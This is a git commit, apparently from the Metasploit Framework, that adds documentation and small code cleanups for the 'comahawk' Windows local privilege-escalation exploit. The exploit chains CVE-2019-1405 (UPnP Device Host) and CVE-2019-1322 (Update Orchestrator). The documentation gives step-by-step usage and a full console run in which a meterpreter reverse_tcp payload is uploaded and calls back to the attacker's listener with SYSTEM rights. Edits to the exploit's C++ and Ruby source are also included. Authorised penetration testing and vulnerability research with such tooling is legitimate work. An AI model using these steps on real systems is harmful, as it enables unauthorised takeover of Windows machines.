Remove debug statements and extra c/ruby libraries

2024-09-04 20:18:27 +02:00 · 2019-12-11 18:42:36 -06:00 · 2019-12-11 18:42:36 -06:00 · 0257861c4f
commit 0257861c4f
parent 942d1e3962
4 changed files with 115 additions and 10 deletions
--- a/data/exploits/cve-2019-1322/CVE-2019-1322-EXE.exe
+++ b/data/exploits/cve-2019-1322/CVE-2019-1322-EXE.exe
--- a/documentation/modules/exploit/windows/local/comahawk.md
+++ b/documentation/modules/exploit/windows/local/comahawk.md
@ -0,0 +1,110 @@
+## Introduction
+
+This leverages two vulnerabilities to move from an authenticated user of
+any level to NT AUTHORITY\LOCAL SERVICE and then from NT AUTHORITY\LOCAL SERVICE
+to NT AUTHORITY\SYSTEM.
+The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+NT AUTHORITY\LOCAL SERVICE
+The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+
+The exploit works by creating a new service, so the exploit may take
+up to minute on test systems, and may take longer in the wild.  Adjusting
+the 
+
+## Usage
+
+1. Create a session on the target system under the context of an authenticated user.
+2. Begin interacting with the module: `use exploit/windows/local/comahawk`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows 10 (10.0 Build 17134) x64
+
+```
+[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49674) at 2019-12-11 18:33:09 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/windows/local/comahawk 
+msf5 exploit(windows/local/comahawk) > set versbose true
+versbose => true
+msf5 exploit(windows/local/comahawk) > set session 1
+session => 1
+msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168
+lhost => 192.168.135.168
+msf5 exploit(windows/local/comahawk) > show options
+
+Module options (exploit/windows/local/comahawk):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
+   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
+   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
+   PATH                              no        Path to write binaries if (%TEMP% by default).
+   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host if (%RAND%.exe by default).
+   SESSION          1                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/comahawk) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
+[*] Exploit uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TcpHnwmv.exe
+[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\EubQLoJJbPMX.exe
+[*] It may take a moment after the session is established for the exploit to exit safely.
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-12-11 18:35:35 -0600
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
@ -1,11 +1,8 @@
-#include <iostream>     #REMOVE BEFORE RELEASE
 #include <atlbase.h>    // CComPtr
 #include <Propvarutil.h>
 #include <string>
 #import "wshom.ocx" no_namespace, raw_interfaces_only  // Error here is a bug. It will still compile

-#pragma comment(lib, "Rpcrt4.lib")
-
 # define command_size 128

 int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
@ -56,13 +53,11 @@ int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
 		{
 			if (i == 1)
 			{
-				wprintf(command);
 				hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
 			}
 			else
 			{
 				hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
-				wprintf(msg[i]);
 			}
 			Sleep(3000);
 		}
--- a/modules/exploits/windows/local/comahawk.rb
+++ b/modules/exploits/windows/local/comahawk.rb
@ -16,16 +16,16 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE
-  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
      'Description'    => %q(
-      THis exploit uses two ulnerabilities to execute a command as an elevated user.
-      The first uses the UPnP service to execute as a LOCAL SERVICE user and the
-      second abuses a misconficuration to allow execution of LOCAL SERVICE accounts
-      to run as system.
+      This exploit uses two ulnerabilities to execute a command as an elevated user.
+      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+      NT AUTHORITY\LOCAL SERVICE
+      The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+      elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>